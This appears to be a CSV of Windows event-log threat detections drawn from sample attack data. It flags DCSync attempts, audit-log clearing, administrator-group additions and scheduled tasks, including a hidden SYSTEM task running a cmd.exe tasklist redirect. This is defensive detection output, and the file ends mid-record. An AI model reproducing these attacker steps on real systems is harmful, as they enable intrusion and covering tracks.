schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702,"
4702
0
0
12804
0
0x8020000000000000
198238969
Security
DC1.insecurebank.local
S-1-5-20
DC1$
insecurebank
0x3e4
\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
<Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
<Version>1.0</Version>
<Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
<URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
<SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
<CalendarTrigger>
<StartBoundary>2019-03-26T12:21:45Z</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="NetworkService">
<UserId>S-1-5-20</UserId>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT1M</Interval>
<Count>3</Count>
</RestartOnFailure>
</Settings>
<Actions Context="NetworkService">
<ComHandler>
<ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
<Data><![CDATA[timer]]></Data>
</ComHandler>
</Actions>
</Task>
",DC1.insecurebank.local,Security
schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702,"
4702
0
0
12804
0
0x8020000000000000
198238774
Security
DC1.insecurebank.local
S-1-5-20
DC1$
insecurebank
0x3e4
\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
<Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
<Version>1.0</Version>
<Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
<URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
<SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
<CalendarTrigger>
<StartBoundary>2019-03-26T11:51:45Z</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="NetworkService">
<UserId>S-1-5-20</UserId>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT1M</Interval>
<Count>3</Count>
</RestartOnFailure>
</Settings>
<Actions Context="NetworkService">
<ComHandler>
<ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
<Data><![CDATA[timer]]></Data>
</ComHandler>
</Actions>
</Task>
",DC1.insecurebank.local,Security
schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702,"
4702
0
0
12804
0
0x8020000000000000
198238563
Security
DC1.insecurebank.local
S-1-5-20
DC1$
insecurebank
0x3e4
\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
<Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
<Version>1.0</Version>
<Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
<URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
<SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
<CalendarTrigger>
<StartBoundary>2019-03-26T11:21:44Z</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="NetworkService">
<UserId>S-1-5-20</UserId>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT1M</Interval>
<Count>3</Count>
</RestartOnFailure>
</Settings>
<Actions Context="NetworkService">
<ComHandler>
<ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
<Data><![CDATA[timer]]></Data>
</ComHandler>
</Actions>
</Task>
",DC1.insecurebank.local,Security
Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"
1102
0
4
104
0
0x4020000000000000
772605
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-500
Administrator
3B
0x7b186
",01566s-win16-ir.threebeesco.com,Security
User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732,"
4732
0
0
13826
0
0x8020000000000000
191030
Security
MSEDGEWIN10
-
S-1-5-20
Administrators
Builtin
S-1-5-32-544
S-1-5-21-3461203602-4096304019-2269080069-1000
IEUser
MSEDGEWIN10
0x27a10f
-
",MSEDGEWIN10,Security
User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732,"
4732
0
0
13826
0
0x8020000000000000
191029
Security
MSEDGEWIN10
-
S-1-5-21-3461203602-4096304019-2269080069-501
Administrators
Builtin
S-1-5-32-544
S-1-5-21-3461203602-4096304019-2269080069-1000
IEUser
MSEDGEWIN10
0x27a10f
-
",MSEDGEWIN10,Security
Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected of performing a DCSync attack,4662,"
4662
0
0
14080
0
0x8020000000000000
203056
Security
DC1.insecurebank.local
S-1-5-21-738609754-2819869699-4189121830-500
Administrator
insecurebank
0x418a6fb
DS
%{19195a5b-6da0-11d0-afd3-00c04fd930c9}
%{c6faf700-bfe4-452a-a766-424f84c29583}
Object Access
0x0
%%7688
0x100
%%7688
{9923a32a-3607-11d2-b9be-0000f87a36b2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
-
",DC1.insecurebank.local,Security
Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"
1102
0
4
104
0
0x4020000000000000
203050
Security
DC1.insecurebank.local
S-1-5-21-738609754-2819869699-4189121830-500
administrator
insecurebank
0x218b896
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack,5136,"
5136
0
0
14081
0
0x8020000000000000
198242594
Security
DC1.insecurebank.local
AF3067E0-BB6F-47C2-AA20-F3F458797F38
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack,5136,"
5136
0
0
14081
0
0x8020000000000000
198242593
Security
DC1.insecurebank.local
57DCCD4C-7381-4371-8480-D74D47019AD8
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698,"
4698
0
0
12804
0
0x8020000000000000
566836
Security
WIN-77LTAPHIQ1R.example.corp
S-1-5-21-1587066498-1489273250-1035260531-500
Administrator
EXAMPLE
0x17e2d2
\CYAlyNSS
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1</Arguments>
</Exec>
</Actions>
</Task>
",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"
1102
0
4
104
0
0x4020000000000000
198238040
Security
DC1.insecurebank.local
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x8d7099
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected of performing a DCSync attack,5136,"
5136
0
0
14081
0
0x8020000000000000
198242592
Security
DC1.insecurebank.local
57DCCD4C-7381-4371-8480-D74D47019AD8
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-0
0c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;D